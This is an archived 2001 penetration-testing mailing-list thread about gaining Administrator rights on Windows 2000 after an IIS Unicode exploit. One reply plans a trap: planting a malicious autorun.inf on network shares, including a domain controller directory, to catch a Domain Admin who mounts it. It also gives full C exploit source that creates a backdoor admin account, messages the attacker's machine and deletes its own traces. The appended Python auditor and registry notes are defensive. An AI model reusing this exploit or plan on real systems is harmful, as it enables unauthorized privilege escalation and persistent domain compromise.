Penetration Testing mailing list archives
Re: [PEN-TEST] Expand right under Win2K
From: "Nelson Brito (a.k.a. stderr)" <stderr () SEKURE ORG>
Date: Wed, 10 Jan 2001 13:59:44 -0200
Paul Cardon wrote:
> Charlie Rhodes wrote:
> > We have a win2k where we have access to a cmd.exe with the rights of the web-server and we would like to obtain administrator rights. Also we don't have the rights to read the SAM files. We tried the well-known methods under Win NT 4.0 (like breaknt.exe, read from raw device) in vain.
> >
> > Do you have network (ftp) access? or floppy access? http://www.bo2k.com should do the trick. You'll probably want to configure the server part off the machine, then load it on.
>
> This is the second time this question has been asked on the list and almost everybody misunderstands the problem. Let me restate it: Suppose a pen-tester has used the IIS Unicode vulnerability to download a back door such as a netcat listener to the target Win2K server and now has a remote cmd shell. At this point the remote shell is running with IUSR_<MACHINE> privilege since that is the privilege level that the Unicode vulnerability provides. Now, how does the pen-tester elevate privilege to Administrator? Any software that is downloaded (tftp, ftp, whatever) through the remote command shell will only run with IUSR_<MACHINE> privilege. Why do people think that downloading BO2K, netcat, or some such will magically elevate privilege? It doesn't. The only things that are possible are:
>
> 1) There is a known privilege escalation vulnerability that can be exploited with local unprivileged access. The attacker can download and run that code to gain Administrator access.
You can use another Win2K || NT machine to execute programs, like:

1 - Copy a "hacked version" of autorun.inf + the hacked program to another Win2K || NT machine;
2 - Put the root directory that hosts autorun.inf in shared mode;
3 - On the IIS Unicode Traversal machine, mount the shared directory;
4 - Now you'll see the "hacked autorun.inf" executing arbitrary commands.

I think this will help you...

Another way to do this is:

1 - Find the PDC (if one exists) in the domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting for a member of "Domain Admins" to log on.

You could do this with a "Shell Folder" vulnerability, and others...
> 2) Brute force attack against accounts with local Administrator privilege.
You can crack the SAM file, because the IUSR_<MACH> has permission to read this file.
> 3) Look for vulnerabilities in other systems that the web server can talk to. Some of those may expose Domain accounts with Administrator privilege on the web server or other systems that are trusted by the web server.
>
> There are others but Win2K does limit some of the nicer possibilities that existed with NT.
>
> -paul
A source example of the "hacked autorun.inf" and program looks like:

--- autorun.cpp
/****************************************************************************************
 * Author   : Nelson Brito                                                              *
 * E-mail   : nelson () secunet com br && stderr () sekure org                          *
 * URL      : http://stderr.sekure.org && http://www.secunet.de                         *
 * Date     : Belem, December 9, 2000.                                                  *
 * Published: Rio de Janeiro, January 9, 2001.                                          *
 ****************************************************************************************/
/****************************************************************************************
 * To exploit this vulnerability you will have to use your brain, because I am not     *
 * going to teach you how to use it; I am only releasing the code.                      *
 *                                                                                      *
 * Thanks to: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer, Thiago(c0nd0r),      *
 *            Felipe(falcon), corb@sekure(what's up?), Nilson Brito(brother),           *
 *            Andre Silveira(phD), Charlene(mi amore) and Mom... =)                     *
 ****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h>    /* The execl() function in VC++. */

FILE *fp;

int main(void){
    char *windir = (char *)getenv("WINDIR");    // Where is %SystemRoot%?
    char *batch  = "C:\\TEMP\\nelson.bat";      // Temporary batch file.

    if(!windir){                                // Cannot build paths without %SystemRoot%.
        fprintf(stderr, "WINDIR is not set\n");
        exit(1);
    }

    /**********************************************************************************
     * Yes, I know, I could have used "NetUserAdd()" and "NetGroupAdd()", but I       *
     * thought it better to use a temporary "batch" file; the code stays smaller.     *
     **********************************************************************************/
    if(!(fp = fopen(batch, "w"))){
        perror("fopen");
        exit(1);                                // Report failure, not success.
    }
    fprintf(fp, "@echo off\n");
    fprintf(fp, "@%s\\system32\\net.exe user nelson secunet /fullname:\"Nelson Brito from Security Networks AG / IBQN\" /comment:\"Penetration Test Account\" /add > nul\n", windir);

    /**********************************************************************************
     * Here you must define whether it will be used on a DC or a stand-alone machine. *
     **********************************************************************************/
#ifdef _IS_A_PDC_
    fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add > nul\n", windir);
    fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add > nul\n", windir);
#else
    fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add > nul\n", windir);
#endif

    /**********************************************************************************
     * At the end of everything, a message is sent to the machine PITBULL, my        *
     * machine. =)                                                                    *
     **********************************************************************************/
    fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege Escalation Exploit Executed\"\n", windir);
    fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch);    // Batch deletes itself.
    fclose(fp);

    execl(batch, batch, NULL);                  // Execute the temporary batch file.
    perror("execl");                            // Execution error.
    return(0);
}
--- autorun.cpp

--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf

PS: It works with PGPDisk at mount time. When you mount the PGPDisk, the SYSTEM recognizes it as a mount point and then executes the "hacked autorun.inf".

That's all,
--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/
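The technique in the post above needs two things: an autorun.inf at a share or volume root whose [autorun] section names a program, and a more privileged user mounting that share. The auditor below is an added example, not code from Nelson's post, that a defender or tester can run over copies of the autorun.inf files found at share roots: it parses the INI-style file and flags every directive that launches code. It goes slightly beyond the post, which only uses `open=`, by also flagging `shellexecute=` and `shell\<verb>\command=`, which Explorer treats the same way. It also decodes the NoDriveTypeAutoRun policy bitmask, whose 0x10 bit (DRIVE_REMOTE) is what governs mapped network drives. The share names and file contents are constructed for illustration.

```python
"""Audit autorun.inf files at share roots and decode the NoDriveTypeAutoRun policy.

Added example (not from the original post). Share names and file contents below
are constructed for illustration.
"""
import re

# [autorun] keys that make Explorer launch a program on mount/open. The post
# only uses "open="; "shellexecute=" and "shell\<verb>\command=" do the same job.
LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$")

# NoDriveTypeAutoRun is a bitmask: bit (1 << GetDriveType value) disables autorun
# for that drive type. Bit 0x10 (DRIVE_REMOTE) is the one that covers mapped shares.
DRIVE_TYPE_BITS = {
    0x01: "DRIVE_UNKNOWN",
    0x02: "DRIVE_NO_ROOT_DIR",
    0x04: "DRIVE_REMOVABLE",
    0x08: "DRIVE_FIXED",
    0x10: "DRIVE_REMOTE",
    0x20: "DRIVE_CDROM",
    0x40: "DRIVE_RAMDISK",
    0x80: "RESERVED",
}


def parse_autorun_inf(text):
    """Minimal INI parser: {section: {key: value}}, sections and keys lowercased."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue  # stray line outside any section; ignored
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_directives(text):
    """Return [(key, value)] for every [autorun] entry that would run a program."""
    autorun = parse_autorun_inf(text).get("autorun", {})
    return [(k, v) for k, v in autorun.items()
            if k in LAUNCH_KEYS or SHELL_COMMAND_RE.match(k)]


def audit_shares(share_files):
    """share_files: {share_root: autorun.inf contents}. Returns findings per share."""
    findings = {}
    for share, contents in share_files.items():
        hits = launch_directives(contents)
        if hits:
            findings[share] = hits
    return findings


def autorun_disabled_for(mask):
    """Drive types on which the policy value `mask` disables autorun."""
    return [name for bit, name in sorted(DRIVE_TYPE_BITS.items()) if mask & bit]


def network_autorun_blocked(mask):
    """True if mapped network drives (DRIVE_REMOTE, bit 0x10) are covered by the mask."""
    return bool(mask & 0x10)


# Constructed sample inputs (hypothetical share names).
SAMPLE_SHARES = {
    r"\\PDC\NETLOGON": "[autorun]\nopen=autorun.exe\n",           # the post's file
    r"\\FILESRV\Software": "[AutoRun]\nicon=setup.exe,0\nlabel=Vendor CD\n",
    r"\\FILESRV\Drivers": ("[autorun]\nshellexecute=inst.hta\n"
                           "shell\\install\\command=setup.exe /s\n"
                           "shell=install\n"),
}

if __name__ == "__main__":
    for share, hits in audit_shares(SAMPLE_SHARES).items():
        for key, value in hits:
            print(f"{share}: {key}={value}  <- runs as whoever mounts the share")
    for mask in (0x00, 0x95, 0xFF):
        print(f"NoDriveTypeAutoRun=0x{mask:02X}: network drives "
              f"{'blocked' if network_autorun_blocked(mask) else 'NOT blocked'}; "
              f"disabled for {autorun_disabled_for(mask)}")
```

A hit on a share that administrators habitually map is exactly the condition the post relies on. The policy value is read from Software\Microsoft\Windows\CurrentVersion\Policies\Explorer under HKLM or HKCU; a value of 0xFF disables autorun on every drive type, and any value without the 0x10 bit leaves network drives exposed.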
Current thread:
- [PEN-TEST] Expand right under Win2K Foldi Tamas (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Charlie Rhodes (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Tamas Foldi (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Pascal C. Kocher (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Charlie Rhodes (Jan 09)
- <Possible follow-ups>
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 11)